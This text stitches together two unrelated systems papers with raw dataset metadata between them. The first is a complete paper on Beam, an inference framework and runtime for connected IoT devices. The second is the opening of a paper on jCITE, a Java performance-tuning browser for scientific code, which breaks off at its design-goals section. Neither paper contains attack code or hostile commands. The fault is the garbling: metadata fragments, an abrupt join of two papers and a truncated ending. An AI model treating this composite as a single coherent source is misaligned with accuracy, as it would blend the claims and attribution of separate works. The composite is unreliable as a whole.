5000, false], [5000, 21925, null]], "google_gemma-3-4b-it_v2tag__is_test_or_quiz": [[0, 5000, false], [5000, 21925, null]], "google_gemma-3-4b-it_v2tag__is_textbook": [[0, 5000, true], [5000, 21925, null]], "pdf_page_numbers": [[0, 263, 1], [263, 645, 2], [645, 645, 3], [645, 1197, 4], [1197, 1537, 5], [1537, 1686, 6], [1686, 2055, 7], [2055, 2431, 8], [2431, 2978, 9], [2978, 3096, 10], [3096, 3428, 11], [3428, 3744, 12], [3744, 3877, 13], [3877, 4400, 14], [4400, 5070, 15], [5070, 5559, 16], [5559, 5886, 17], [5886, 6365, 18], [6365, 6395, 19], [6395, 7034, 20], [7034, 7118, 21], [7118, 7500, 22], [7500, 8001, 23], [8001, 8393, 24], [8393, 8968, 25], [8968, 9101, 26], [9101, 9206, 27], [9206, 9487, 28], [9487, 9654, 29], [9654, 9940, 30], [9940, 10194, 31], [10194, 10585, 32], [10585, 10843, 33], [10843, 11113, 34], [11113, 11523, 35], [11523, 11990, 36], [11990, 12327, 37], [12327, 12343, 38], [12343, 12653, 39], [12653, 12807, 40], [12807, 13396, 41], [13396, 13801, 42], [13801, 14209, 43], [14209, 14679, 44], [14679, 15330, 45], [15330, 15347, 46], [15347, 16013, 47], [16013, 16552, 48], [16552, 16890, 49], [16890, 17337, 50], [17337, 17833, 51], [17833, 18144, 52], [18144, 18488, 53], [18488, 18921, 54], [18921, 19350, 55], [19350, 19671, 56], [19671, 20127, 57], [20127, 20548, 58], [20548, 20835, 59], [20835, 21301, 60], [21301, 21549, 61], [21549, 21925, 62]], "pipe_delimited_lines_v1__pipe_delimited_lines_v1__pipe_delimited_lines_ratio": [[0, 21925, 0.0]]}
olmocr_science_pdfs
2024-12-09
2024-12-09
6efd6a2a2d6ae4595a0ce21fbe159653e7fc12ea
A Case for Ending Monolithic Apps for Connected Devices

Rayman Preet Singh (Univ. of Waterloo), Chenguang Shen (UCLA), Amar Phanishayee, Aman Kansal, Ratul Mahajan (Microsoft Research)

**1 Introduction**

Connected sensing devices, such as cameras, thermostats, and in-home motion, door-window, energy, and water sensors [1], collectively dubbed the Internet of Things (IoT), are rapidly permeating our living environments [2], with an estimated 50 billion such devices in use by 2020 [8]. They enable a wide variety of applications spanning security, efficiency, healthcare, and others. Typically, these applications collect data using sensing devices to draw inferences about the environment or the user, and use the inferences to perform certain actions. For example, Nest [10] uses motion sensor data to infer home occupancy and adjusts the thermostat.

Most applications that use connected devices today are built in a monolithic way. That is, applications are tightly coupled to the hardware, and need to implement all the data collection, inferencing, and user functionality related logic. For application developers, this complicates the development process and hinders broad distribution of their applications, because the cost of deploying their specific hardware limits user adoption. For end users, each sensing device they install is limited to a small set of applications, even though the hardware capabilities may be useful for a broader set of applications.

How do we break free from this monolithic and restrictive setting? Can we enable applications to work seamlessly in heterogeneous environments with different types of connected sensors and devices, while leveraging devices that may only be available opportunistically, such as smartphones and tablets?

To address this problem, we start from the insight that many inferences required by applications can be drawn using multiple types of connected devices. For instance, home occupancy can be inferred using motion sensors (such as those in security systems or Nest [10]), cameras (e.g., Dropcam [3], Simplicam [14]), microphones, smartphone GPS, or a combination of these, since each may have different sources of error. We posit that inference logic, traditionally left up to applications, ought to be abstracted out as a system service. Such a service should relieve application developers of the burden of implementing and training commonly used inferences, and it should enable applications to work using any of the sensing devices that the shared inference logic supports.

This paper discusses the key challenges in designing the proposed service. First, the service must decouple (i) "what is sensed" from "how it is sensed", and (ii) "what is inferred" from "how it is inferred". In doing so, it should ensure inference extensibility and provide a uniform interface to inferences that hides sensor-specific intricacies (e.g., camera frame rate, motion sensitivity level). Second, the service should enable seamless use of sensors on mobile devices by handling environmental dynamics resulting from device and user mobility. Third, while serving required inferences to applications, the service should ensure efficient use of resources, e.g., by selecting the optimal subset of sensors to serve active applications, sharing overlapping inference computations, and hosting computations on suitable devices. To explore these challenges concretely, we propose Beam, an application framework and runtime for inference-driven applications.
Beam provides applications with inference-based abstractions. Applications simply specify their inference requirements, while Beam bears the onus of identifying the required sensors, initiating data processing on suitable devices, handling environmental dynamics, and using resources efficiently.

**2 Key Design Requirements**

Our motivation for designing Beam is data-driven, inference-based applications, aimed at homes [10, 16], individual users [9, 11, 41, 48, 50], and enterprises [6, 13, 20, 33, 42]. We identify three key challenges for Beam by analyzing two popular application classes in detail, one that infers environmental attributes and another that senses an individual user.

**Rules:** A large class of popular applications is based on the 'If This Then That (IFTTT)' pattern [7, 47]. IFTTT enables users to create their own rules connecting sensed attributes to desired actions. We consider a particular rules application which alerts a user if a high-risk appliance, e.g., an electric oven, is left on when the home is unoccupied [15, 44]. This application uses the appliance-state and home occupancy inferences.

Figure 1: Improvement in occupancy and activity inference accuracy by combining multiple devices. For occupancy, sensor set 1 = {camera, microphone} in one room and set 2 = {PC interactivity detection} in a second room. For physical activity, set 1 = {phone accelerometer} and set 2 = {wrist-worn FitBit}.

**Quantified Self (QS):** The second class we consider is Quantified Self applications [9, 11, 19, 25, 38, 46], which disaggregate a user's daily routine by tracking her physical activity (walking, running, etc.), social interactions (loneliness), mood (bored, focused), computer use, and more.

In analyzing these two popular classes of applications, we identify the following three key design requirements for an inference framework:

R1) Decompose applications, inference algorithms, and devices. Data-driven inferences can often be derived using data from multiple devices. Combining inputs from multiple devices, when available, generally leads to improved inference accuracy (often overlooked by developers [10]). In Figure 1 we illustrate the improvement in inference accuracy for the occupancy and physical activity inferences, used in the Rules and Quantified Self applications respectively; 100% accuracy maps to manually logged ground truth over 28 hours. Hence, applications should not be restricted to using a single sensor or a single inference algorithm. At the same time, applications should not be required to incorporate device discovery, handle the challenges of potentially using devices over the wide area (e.g., remote I/O and tolerating disconnections), use disparate device APIs, and instantiate and combine multiple inferences depending on available devices. Therefore an inference framework should require an application to specify only the desired inference, e.g., occupancy (in addition to inference parameters like sampling rate and coverage), while handling the complexity of configuring the right devices and inference algorithms.

R2) Handle environmental dynamics. Applications are often interested in tracking user and device mobility, and in adapting their processing accordingly. For instance, the QS applications need to track which locations a user frequents (e.g., home, office, car, gym, meeting room, etc.), handle intermittent connectivity, and more.
Application development stands to be greatly simplified if the framework were to seamlessly handle such environmental dynamics, e.g., automatically update the selection of devices used for drawing inferences based on user location. Hence the QS application, potentially running on a cloud server, could simply subscribe to the activity inference, which would be dynamically composed of sub-inferences from the various devices tracking the user.

R3) Optimize resource usage. Applications often involve continuous sensing and inferring, and hence consume varying amounts of system resources across multiple devices over time. Such an application must structure its sensing and inference processing across multiple devices, in keeping with the devices' resource constraints. This adds undue burden on developers. For instance, in the QS application, wide-area bandwidth constraints may prevent backhauling of high-rate sensor data. Moreover, whenever possible, inferences should be shared across multiple applications to prevent redundant resource consumption. Therefore an inference framework must not only facilitate sharing of inferences, but in doing so must optimize for efficient resource use (e.g., network, battery, CPU, memory) while meeting resource constraints.

**3 Related Work**

Beam is the first framework that (i) decouples applications, inference algorithms, and devices, (ii) handles environmental dynamics, and (iii) automatically splits sensing and inference logic across devices while optimizing resource usage. We classify prior work into four categories and compare them against the requirements above (Table 1).

<table>
<thead>
<tr>
<th>Category</th>
<th>Prior work</th>
</tr>
</thead>
<tbody>
<tr>
<td>Device abstractions</td>
<td>[24], [12], [18]</td>
</tr>
<tr>
<td>Mobile sensing</td>
<td>[23], [40]</td>
</tr>
<tr>
<td>Cross-device</td>
<td>[49], [45]</td>
</tr>
<tr>
<td>Macro-programming</td>
<td>[22], [26], [35]</td>
</tr>
</tbody>
</table>

Table 1: Categorization of prior work against requirements R1–R3.

**Mobile sensing frameworks:** Existing work has focused on applications requiring continuous sensing on mobile devices. Kobe [23] and Auditeur [40] propose building libraries of inference algorithms to promote code re-use and to enable developers to select inference algorithms. Other work [29, 30, 31, 32, 34] has focused on improving resource utilization by sharing sensing and data processing across multiple applications on a mobile device. Senergy [32] automates selection of inference algorithms driven by an application's requirements on a mobile device. These approaches overlook handling environmental dynamics across devices, and do not address optimizing resource use for inferences across multiple devices. Moreover, they require manual composition of certain inference parameters (e.g., coverage), thus providing limited decoupling of inference algorithms.

**Cross-device frameworks:** Semantic Streams [49] and Task Cruncher [45] address sharing sensor data and data processing across devices, but are limited to simple stream processing methods, e.g., aggregates, rather than sophisticated inferences. They overlook decoupling of sensing and inferring, as well as handling of dynamics.

**Macro-programming frameworks:** Macro-programming frameworks [22, 26, 35] provide abstractions to allow applications to dynamically compose dataflows [36, 39]. However, these approaches focus on data streaming and aggregation rather than generic inferences, and do not target general-purpose compute devices, e.g., phones and PCs. In addition, they do not address handling of environmental dynamics and resource optimization across devices at runtime.

**4 Beam Inference Framework**

We propose Beam as a framework for distributed applications using connected devices. Applications in Beam subscribe to high-level inferences. Beam dynamically composes the required modules to satisfy application requests by using appropriate devices in the given deployment. Central to Beam's design are a set of abstractions that we describe next.

**Inference Graphs:** Inference graphs are directed acyclic graphs that connect devices to applications. The nodes are inference modules, and edges correspond to channels that facilitate the transmission of inference data units (IDUs) between modules. Figure 2 shows an example inference graph for a Quantified Self application that uses eight different devices spread across the user's home and workplace, and includes mobile and wearable devices. Composing an inference as a directed graph enables sharing of data processing modules across applications and across modules that require the same input. In Beam, each compute device associated with a user, such as a tablet, phone, PC, or home hub, has a part of the runtime, called the Engine. Engines host inference graphs and interface with other engines. Figure 3 shows two engines, one on the user's home hub and another on her phone; the inference graph for QS shown earlier is split across these engines, with the QS application itself running on a cloud server. For simplicity, we do not show another engine that may run on the user's work PC.

Figure 2: Inference graph for Quantified Self app.

**IDU:** An Inference data unit (IDU) is a typed inference, and in its general form is a tuple $<t, e, s>$, which denotes any inference with state information $s$, generated by an inference algorithm at time $t$ with error $e$. The types of the inference state $s$ and the error $e$ are specific to the inference at hand. For instance, $s$ may be of a numerical type such as a double (e.g., inferred energy consumption) or an enumerated type such as {high, medium, low}. Similarly, the error $e$ may specify a confidence measure (e.g., standard deviation), a probability distribution, or an error margin (e.g., radius). IDUs abstract away "what is inferred" from "how it is inferred". The latter is handled by inference modules, which we describe next.

**Inference Modules:** Beam encapsulates inference algorithms into typed modules. Inference modules consume IDUs from one or more modules, perform certain computation using IDU data and pertinent in-memory state, and output IDUs. Special modules called adapters interface with underlying sensors and output sensor data as IDUs. Adapters decouple "what is sensed" from "how it is sensed". Module developers specify the IDU types a module consumes, the IDU type it generates, and the module's input dependency (e.g., {PIR} OR {camera AND mic}). Modules have complete autonomy over how and when to output an IDU, and can maintain arbitrary internal state. For instance, an occupancy inference module may (i) specify input IDUs from microphone, camera, and motion sensor adapters, (ii) allow multiple microphones as input, and (iii) maintain internal state to model ambient noise.

**Channels:** To ease inference composition, channels link modules to each other and to applications. They abstract away the complexities of connecting modules across different devices, including dealing with device disconnections, and allow for optimizations such as batching IDU transfers for efficiency. Every channel has a single writer and a single reader module. Modules can have multiple input and output channels. Channels connecting modules on the same engine are local. Channels connecting modules on two different engines, across a local or wide area network, are remote channels. They enable applications and inference modules to seamlessly use remote devices or remote inference modules.

**Coverage tags:** Coverage tags help manage sensor coverage. Each adapter is associated with a set of coverage tags which describes what the sensor is sensing. For example, a location string tag can indicate a coverage area such as "home", and a remote monitoring application can use this tag to request an occupancy inference for this coverage area. Coverage tags are strongly typed. Beam uses tag types only to differentiate tags and does not dictate tag semantics. This allows applications complete flexibility in defining new tag types. Adapters are assigned tags by the respective engines at setup time, and tags are updated at runtime to handle dynamics.

Beam's runtime also includes a Coordinator, which interfaces with all engines in a deployment and runs on a server that is reachable from all engines. The coordinator maintains remote channel buffers to support reader or writer disconnections (typical for mobile devices). It also provides a place to reliably store the state of inference graphs at runtime while being resistant to engine crashes and disconnections. The coordinator is also used to maintain reference time across all engines. Engines interface with the coordinator using a persistent web-socket connection, and instantiate and manage the parts of the inference graph(s) local to them.

**4.1 Beam Runtime**

The Beam runtime creates or updates inference graphs when applications request inferences (R1), and mutates the inference graphs to handle environmental dynamics (R2) and to optimize resource usage (R3).

**Inference graph creation:** An application may run on any user device, and the sensors required for a requested inference may be spread across devices. Applications ask their local Beam engine for all inferences they require. All application requests are forwarded to the coordinator, which uses the requested inference to look up the required module. It recursively resolves all required inputs of that module (as per its specification), and re-uses matching modules that are already running. The coordinator maintains a set of such inference graphs as an incarnation. The coordinator determines where each module in the inference graph should run and formulates the new incarnation. The coordinator initializes buffers for remote channels, and partitions the inference graphs into engine-specific subgraphs which are sent to the engines. Engines receive their respective subgraphs, compare each received subgraph to existing ones, and update them by terminating deleted channels and modules, initializing new ones, and changing channel delivery modes and module sampling rates as needed. Engines ensure that exactly one inference module of each type with a given coverage tag is created.
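Before turning to delivery guarantees, here is a rough illustration of the shapes these abstractions might take: an IDU, an inference module interface, and an inference request. Beam's actual prototype is written in C# and its API is not given in the text, so this Java sketch and all names in it (IDU, InferenceModule, InferenceRequest, DeliveryMode, and so on) are hypothetical.

```java
import java.time.Instant;
import java.util.List;

// Hypothetical Java sketch of the abstractions described in the text.

/** An inference data unit <t, e, s>: timestamp, error estimate, typed state. */
record IDU<S, E>(Instant t, E error, S state) {}

/** Example enumerated state type for an occupancy inference. */
enum Occupancy { OCCUPIED, EMPTY }

/** An inference module consumes IDUs from its inputs and emits its own IDUs. */
interface InferenceModule<S, E> {
    String inputDependency();       // e.g. "{PIR} OR {camera AND mic}"
    void onInput(IDU<?, ?> input);  // consume an input IDU, update internal state
    IDU<S, E> latestOutput();       // most recent IDU this module produced
}

/** Channel delivery modes, as described in the text. */
enum DeliveryMode { FRESH_PUSH, LAZY_PUSH }

/** What an application hands to its local engine when requesting an inference. */
record InferenceRequest(
        String inferenceType,          // e.g. "occupancy"
        DeliveryMode mode,             // fresh or lazy (batched) delivery
        List<String> coverageTags,     // e.g. ["home"]
        long maxDetectionLatencyMs) {} // optional sampling requirement

class BeamSketch {
    public static void main(String[] args) {
        InferenceRequest req = new InferenceRequest(
                "occupancy", DeliveryMode.LAZY_PUSH, List.of("home"), 60_000);
        IDU<Occupancy, Double> idu =
                new IDU<>(Instant.now(), 0.9, Occupancy.OCCUPIED);
        System.out.println(req + " -> " + idu);
    }
}
```

The point of the sketch is only that the request names an inference and a coverage tag, never a device: which adapters and modules end up producing the IDUs is the coordinator's decision.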
**Inference delivery and guarantees:** For each inference request, Beam returns a channel to the application. The inference request consists of (i) the required inference type or module, (ii) the delivery mode, (iii) coverage tags, and (iv) sampling requirements (optional). The delivery mode is a channel property which captures data transport optimizations. For instance, in the fresh push mode, an IDU is delivered as soon as the writer module generates it, while in the lazy push mode, the reader chooses to receive IDUs in batches (thus amortizing network transfer costs from battery-limited devices). Remote channels provide IDU delivery in the face of device disconnections by using buffers at the coordinator and the writer engine. Channel readers are guaranteed (i) no duplicate IDU delivery, and (ii) FIFO delivery based on IDU timestamps. Currently, remote channels use a drop-tail policy to minimize wide-area data transfers in the event of a disconnected or lazy reader. This means that when a reader re-connects after a long disconnection, it first receives old inference values followed by more recent ones. A drop-head policy may be adopted to circumvent this, at the cost of increased data transfers.

In requesting inferences, applications use tags to specify coverage requirements. Furthermore, an application may specify sampling requirements as a latency value that it can tolerate in detecting a change of state for an inference (e.g., walking periods of more than 1 minute). This allows adapters and modules to temporarily halt sensing and data processing to reduce battery, network, CPU, or other resource use.

**Optimizing resource use:** The Beam coordinator uses inference graphs as the basis for optimizing resource usage. The coordinator re-configures inference graphs by remapping the engine on which each inference module runs. Optimizations are performed either reactively, i.e., when an application issues or cancels an inference request, or proactively at periodic intervals. Beam's default reactive optimization minimizes the number of remote channels, and its proactive optimization minimizes the amount of data transferred over remote channels. Other potential optimizations can minimize battery, CPU, and/or memory consumption at engines. When handling an inference request, the coordinator first incorporates the requested inference graph into the incarnation, re-using already running modules and merging inference graphs if needed. For new modules, the coordinator decides on which engines they should run (by minimizing the number of remote channels). Engines profile their subgraphs and report profiling data (e.g., per-channel data rate) to the coordinator periodically. The coordinator annotates the incarnation using this data and periodically re-evaluates the mapping of inference modules to engines. Beam's default proactive optimization thus minimizes wide-area data transfers.

**Handling dynamics:** Movement of users and devices can change the set of sensors that satisfy an application's requirements. For instance, consider an application that requires camera input from the device currently facing the user at any time, such as the camera on her home PC, office PC, or smartphone. In such scenarios, the inference graph needs to be updated dynamically. Beam updates the coverage tags to handle such dynamics. Certain tags, such as those of the location type (e.g., "home"), can be assumed to be static (edited only by the user), while for certain other types, e.g., user, the sensed subject is mobile and hence the sensors that cover it may change.
The coordinator's tracking service manages the coverage tags associated with adapters on the various engines. The engines' tracking service updates the user coverage tags as the user moves. For example, when the user leaves her office and arrives at home, the tracking service removes the user tag from device adapters in the office and adds it to adapters of devices deployed in the home. The tracking service relies on device interactions to track users: when a user interacts with a device, it updates the tags of all sensors on the device to include the user's tag. When coverage tags change (e.g., due to user movement and change in sensor coverage), the coordinator re-computes the inference graphs and sends updated subgraphs to the affected engines.

**4.2 Implementation**

Our Beam prototype is implemented in C# as a cross-platform portable service that can be used by .NET v4.5, Windows Store 8.1, and Windows Phone 8.1 applications. Module binaries are currently wrapped within the service, but may also be downloaded from the coordinator on demand. We have implemented 8 inference modules: mic-occupancy [27], camera-occupancy, appliance-use [21, 28], occupancy, pc-activity [37], fitness-activity [43], semantic-location, and social-interaction; and 9 adapters: tablet and PC mic, power-meter, Fitbit [4], GPS, accelerometer, pc-interaction, pc-event, and a HomeOS [24] adapter to access all its device drivers. We have implemented the two sample applications described in Section 2. Both applications run on a cloud VM; Beam hosts the modules for their inferences across the user's home PC, work PC, and phone. Compared to monolithic or library-based approaches, we find that for these applications using Beam's framework results in up to 4.5× fewer tasks and 12× fewer source lines of code (SLoC), and up to 3× higher inference accuracy due to Beam's handling of environmental dynamics, while Beam's dynamic optimizations match hand-optimized versions for network resource usage. We aim to enrich Beam's optimizer to include optimizations for battery, CPU, and memory, and plan to extend tracking support to objects using passive tags, e.g., RFID or QR codes [17].

**5 Conclusion**

Applications using connected devices are difficult to develop today because they are constructed as monolithic silos, tightly coupled to sensing devices, and must implement all data sensing and inference logic, even as devices move or are temporarily disconnected. We present Beam, a framework and runtime for distributed inference-driven applications that (i) decouples applications, inference algorithms, and devices, (ii) handles environmental dynamics, and (iii) automatically splits sensing and inference logic across devices while optimizing resource usage. Using Beam, applications only specify "what should be sensed or inferred," without worrying about "how it is sensed or inferred." Beam simplifies application development and maximizes the utility of user-owned devices. **It is time to end monolithic apps for connected devices.**
{"Source-Url": "https://www.microsoft.com/en-us/research/wp-content/uploads/2016/10/Beam_HotOS_2015.pdf", "len_cl100k_base": 4726, "olmocr-version": "0.1.50", "pdf-total-pages": 7, "total-fallback-pages": 0, "total-input-tokens": 23759, "total-output-tokens": 7361, "length": "2e12", "weborganizer": {"__label__adult": 0.0004532337188720703, "__label__art_design": 0.0005955696105957031, "__label__crime_law": 0.0004727840423583984, "__label__education_jobs": 0.0006990432739257812, "__label__entertainment": 0.00013267993927001953, "__label__fashion_beauty": 0.0002703666687011719, "__label__finance_business": 0.00040602684020996094, "__label__food_dining": 0.0004422664642333984, "__label__games": 0.0009436607360839844, "__label__hardware": 0.0059967041015625, "__label__health": 0.0010528564453125, "__label__history": 0.0004742145538330078, "__label__home_hobbies": 0.00018727779388427737, "__label__industrial": 0.0007529258728027344, "__label__literature": 0.0003516674041748047, "__label__politics": 0.00034546852111816406, "__label__religion": 0.0004684925079345703, "__label__science_tech": 0.375732421875, "__label__social_life": 0.0001170039176940918, "__label__software": 0.0150604248046875, "__label__software_dev": 0.59326171875, "__label__sports_fitness": 0.0004584789276123047, "__label__transportation": 0.0011472702026367188, "__label__travel": 0.0002651214599609375}, "weborganizer_max": "__label__software_dev", "avg_fraction_numbers_in_line_v1__avg_fraction_numbers_in_line_v1__avg_fraction_numbers_in_line_ratio": [[0, 30617, 0.02709]], "fineweb_edu_fasttext_gt2__fineweb_edu_fasttext_gt2__score": [[0, 30617, 0.43511]], "ft_lang_id_en_doc_v2__ft_lang_id_en_doc_v2__en": [[0, 30617, 0.84344]], "google_gemma-3-12b-it_contains_pii": [[0, 4591, false], [4591, 8819, null], [8819, 13943, null], [13943, 18066, null], [18066, 23726, null], [23726, 27797, null], [27797, 30617, null]], "google_gemma-3-12b-it_is_public_document": [[0, 4591, true], [4591, 8819, null], [8819, 13943, null], [13943, 18066, null], [18066, 23726, null], [23726, 27797, null], [27797, 30617, null]], "google_gemma-3-4b-it_v2tag__is_academic_paper": [[0, 5000, true], [5000, 30617, null]], "google_gemma-3-4b-it_v2tag__is_class_syllabus": [[0, 5000, false], [5000, 30617, null]], "google_gemma-3-4b-it_v2tag__is_completion_certificate": [[0, 5000, false], [5000, 30617, null]], "google_gemma-3-4b-it_v2tag__is_court_notice": [[0, 5000, false], [5000, 30617, null]], "google_gemma-3-4b-it_v2tag__is_homework_assignment": [[0, 5000, false], [5000, 30617, null]], "google_gemma-3-4b-it_v2tag__is_news_article": [[0, 5000, false], [5000, 30617, null]], "google_gemma-3-4b-it_v2tag__is_public_order": [[0, 5000, false], [5000, 30617, null]], "google_gemma-3-4b-it_v2tag__is_resume_cv": [[0, 5000, false], [5000, 30617, null]], "google_gemma-3-4b-it_v2tag__is_test_or_quiz": [[0, 5000, false], [5000, 30617, null]], "google_gemma-3-4b-it_v2tag__is_textbook": [[0, 5000, false], [5000, 30617, null]], "pdf_page_numbers": [[0, 4591, 1], [4591, 8819, 2], [8819, 13943, 3], [13943, 18066, 4], [18066, 23726, 5], [23726, 27797, 6], [27797, 30617, 7]], "pipe_delimited_lines_v1__pipe_delimited_lines_v1__pipe_delimited_lines_ratio": [[0, 30617, 0.05042]]}
olmocr_science_pdfs
2024-11-28
2024-11-28
8d51d2249d0bd68152b9107064dbe3f5ffb530e9
Java and Scientific Programming: Portable Browsers for Performance Programming

Michal Cierniak (cierniak@cs.rochester.edu), Department of Computer Science, University of Rochester, Rochester, NY 14627
Suresh Srinivas (ssuresh@engr.sgi.com), Silicon Graphics Incorporated, 2011 North Shoreline Blvd, Mountain View, CA 94040

Abstract

We present jCITE, a performance tuning tool for scientific applications. By combining the static information produced by the compiler with the profile data from real program execution, jCITE can be used to quickly understand performance bottlenecks. The compiler information gives a clear picture of which optimizations have been performed; the user can also find out which optimizations have not been applied and why. Platform independence makes Java the ideal implementation platform for our tool. SGI users can have the same performance analysis tool on all platforms: you can run jCITE on an SGI O2 computer to optimize code for that machine, or you can run jCITE from within Netscape on a SPARCstation to analyze the performance of a Cray application. In our experiments we were able to significantly speed up some SPEC95 applications in a few days or even a few hours, without any prior knowledge of those applications.

1 Introduction – the need for performance programming for Scientific Computing

Performance is at the heart of scientific and engineering computing. Tuning a critical inner loop can lead to a drastic reduction in the running time of a large scientific or engineering application. This paper is about portable performance programming tools for the scientific and engineering programmer. Larry Carter and Bowen Alpern define performance programming as "programming when a 30% improvement in speed may be worth weeks of work" [1]. According to their work, obtaining maximum application performance on a given platform is difficult. Completely automatic optimizations, while very effective, do not fully solve the problem. This is evident in the complex optimization options used to compile standard benchmarks, like SPEC95 [10].

By performance programming we mean tuning applications with very demanding performance requirements. Performance programming usually requires manual tuning of the source code and compiler options to obtain the fastest code. Having a number of performance programmers is common in hardware companies whose focus is scientific and engineering computation. They help tune a number of large ISV (Independent Software Vendor) applications such as LS-DYNA3D, a large Fortran application which is used in areas ranging from automobile design and safety to biomechanics.

The unfortunate reality is that performance programming is hard. The advent of optimizing compilers which perform various transformations on the program source to better utilize the memory hierarchy has made performance programming even harder. A performance programmer usually has the following in their arsenal:

- Algorithmic and computational knowledge in specific areas such as Fluid Dynamics, Operations Research, Structural Mechanics, and Computational Chemistry.
- A good understanding of compiler options (flags), computer architecture, and assembly programming.
- Dynamic tools such as prof, pixie, and hardware counters (in newer microprocessors such as the MIPS R10000, the Digital Alpha 21164, and the Sun UltraSPARC) to understand the profile of their application and identify subroutines or functions on which to focus their attention.
We have designed jCITE, a Java-based browser, to alleviate the performance programming problem. jCITE helps optimize applications whose performance is difficult to understand. It does so by adding several things to the performance programmer's arsenal:

- Details of compiler optimization, or optimization failure (non-optimization), information at the level of the application source.
- Visual metaphors for correlating original source, compiler-transformed source, and runtime performance information.
- The ability to query for detailed compiler optimization information at application hot-spots (and elsewhere as well).
- A portable browser that can be used in a heterogeneous environment (e.g., connecting to an SGI Origin2000 through an SGI O2, Apple Power Mac, or Compaq Presario).

jCITE uses profiling information to find the program fragments on which the performance programmer has to concentrate. If the hardware allows it, the same runtime information can also be used to make a rough judgment on the nature of the performance problem (R10000 performance counters [11, 9] can measure and classify cache misses, floating point operations, and other processor events useful for understanding performance). The runtime information is combined with the information produced by the compiler about applied optimizations and non-optimizations.

jCITE does not:

- Assist the performance programmer in choosing data structures or algorithms.
- Allow editing of the program. We assume that available editors are used for that purpose.

In the jCITE browser we combine both the compile-time and runtime performance information in a visually appealing way. We introduce a new visual metaphor known as *synchronization*. Say you have two text windows, one containing the original program source and the other containing the compiler-transformed source. By *synchronizing* them we mean that when the mouse is moved over a region of text in the original source window, the regions of text in the transformed source that were derived from that region are highlighted in the second window, and vice versa. We have also borrowed other metaphors, such as hypertext and context-sensitive pop-up menus, that have become popular in Web browsers.

The paper is structured into the following sections:

- **Case Studies:** where we illustrate how jCITE works using two examples familiar to scientific programming.
- **Design and Architecture:** where we describe the inner workings of the jCITE browser.
- **Experiments:** where we present results from using jCITE to do performance tuning of the compiler and a SPEC95 integer application.
- **Lessons Learned and Conclusions:** where we describe what we learned in the process, as well as related and future work.

2 Case Studies

We walk through two examples (matrix multiply and SPEC95 multigrid) to illustrate some of the capabilities of the jCITE browser.

2.1 Example 1—matrix multiply

Multiplying two matrices is a recurring theme in scientific computing. We use a simple program that performs matrix multiplication in several different ways, and on matrices of several different sizes, to illustrate:

- Synchronizing original source and compiler-transformed source.
- Querying static compiler information produced for loop nests and inner loops.

In Figure 1 we can see a snapshot of jCITE when the matrix multiply Fortran program is loaded in.
jCITE automatically loads in any compiler-transformed sources if the programmer asked the compiler to produce them (the option -LIST:cite causes the SGI MIPS Pro 7.x compilers to produce the relevant files). In the snapshot the current line was 75 in the subroutine mmjki200. By default jCITE assumes that the programmer wants synchronization between the source and the transformed source; this can be turned off. In the same figure we see a number of lines in the right window highlighted in blue. These are the lines in the compiler-transformed source that came originally from line 75. As we can see from the snapshot, the compiler has performed a number of transformations on this small—8-line—subroutine. It has:

- Peeled out the initialization of the result matrix.
- Changed the order of the loops: "i" is now the inner loop.
- Tiled the loops to utilize the memory hierarchy better, for both the first and second levels of cache.
- Register-blocked, or unrolled and jammed, the inner tiles to use registers better and to make the code easier to schedule for the code generator.

(A rough sketch of what this kind of loop restructuring looks like appears at the end of Section 2.) The compiler—in this case the loop nest optimizer—produces this information for jCITE in a separate file. Figure 2 shows an example of what is produced for the loop nest on lines 71, 72, and 74. A Lisp-like format is used for historical reasons (jCITE had its origins in CITE, which was written to work within Lucid's XEmacs).

2.2 Example 2—SPEC95 107.mgrid

The 107.mgrid program is part of the SPEC CPU95 (floating point) benchmark suite. It is a multi-grid solver in a 3D potential field. Its reference dataset is quite large, but the program itself is just 500 lines of Fortran 77 code. It is also one of the programs easiest to parallelize with an automatic parallelizer. We use it as a case study to illustrate:

- Annotating runtime performance information on the application source while maintaining correlation between the application source and the compiler-transformed source.
- Automatic parallelization information, including array region information when the parallelizer cannot parallelize a loop.
- Combining runtime performance information with compiler information.
- Annotating multiple kinds of runtime performance information on the application source.

Figure 3 shows a snapshot of jCITE when the mgrid program is loaded and the programmer asks to see the number of cycles (the histogram labeled cy_hwc) each line of mgrid has consumed. The cycles are measured using program counter sampling whenever the R10000 processor's internal cycle counter overflows. The programmer can also ask jCITE to hypertext/annotate all the loops that were or were not parallelized. Notice how the scrollbars are also painted to show the program hot-spots. For the loop nest we are seeing in the figure, the compiler has parallelized the outermost loop and so has partitioned the I2 loop amongst all the processors. The figure also shows that the compiler has moved a number of array references out of the loop. This snapshot is from a pre-release version of the automatic parallelizer.

Figure 4 shows a snapshot of jCITE with mgrid, but at a later point than Figure 3. The programmer has asked to see the cycle counts (cy_hwc) and secondary cache misses (dsc_hwc), as well as compiler information for one of the loops. Notice how a new embedded graphics window shows the cache miss histogram and a new split window at the bottom shows the compiler information.
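As promised above, here is a rough sketch of the loop restructuring reported for the matrix-multiply case study: a plain j-k-i loop nest and a tiled, interchanged variant of the kind the compiler listing describes. The code is written in Java purely for illustration; the tile size is an arbitrary choice, this is not the SGI compiler's output, and both versions assume the result matrix c starts out zeroed.

```java
public class MatMul {
    // Naive j-k-i loop nest, similar in spirit to the Fortran mmjki subroutine.
    static void multiplyNaive(double[][] a, double[][] b, double[][] c, int n) {
        for (int j = 0; j < n; j++)
            for (int k = 0; k < n; k++)
                for (int i = 0; i < n; i++)
                    c[i][j] += a[i][k] * b[k][j];
    }

    // Interchanged and cache-tiled variant: the kind of restructuring the
    // compiler listing reports (tiling for the caches, i innermost).
    // The tile size 32 is illustrative only.
    static void multiplyTiled(double[][] a, double[][] b, double[][] c, int n) {
        final int T = 32;
        for (int jj = 0; jj < n; jj += T)
            for (int kk = 0; kk < n; kk += T)
                for (int j = jj; j < Math.min(jj + T, n); j++)
                    for (int k = kk; k < Math.min(kk + T, n); k++) {
                        double bkj = b[k][j];  // loop-invariant load hoisted out
                        for (int i = 0; i < n; i++)
                            c[i][j] += a[i][k] * bkj;
                    }
    }
}
```

The tiled version computes exactly the same sums in a different order; the benefit comes from reusing cached blocks of the operands, which is what the cache-blocking and register-blocking entries in the compiler's report are describing.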
3 Design and Architecture of jCITE

Compilers alone cannot provide a fully automatic solution to the performance programming problem, for the following reasons:

- Programmers often have high-level knowledge about the problem and the application domain which can be used for optimizations, but which cannot be inferred from the source code alone.
- Some optimization techniques, while possible in practice, are not implemented in the compiler (or are implemented incorrectly).

The problem with manual tuning is that complex scientific programs are difficult to understand—especially if the programmer who performs the tuning for a given platform is not the original author of the application, or if the application had multiple authors.

3.1 Design Goals

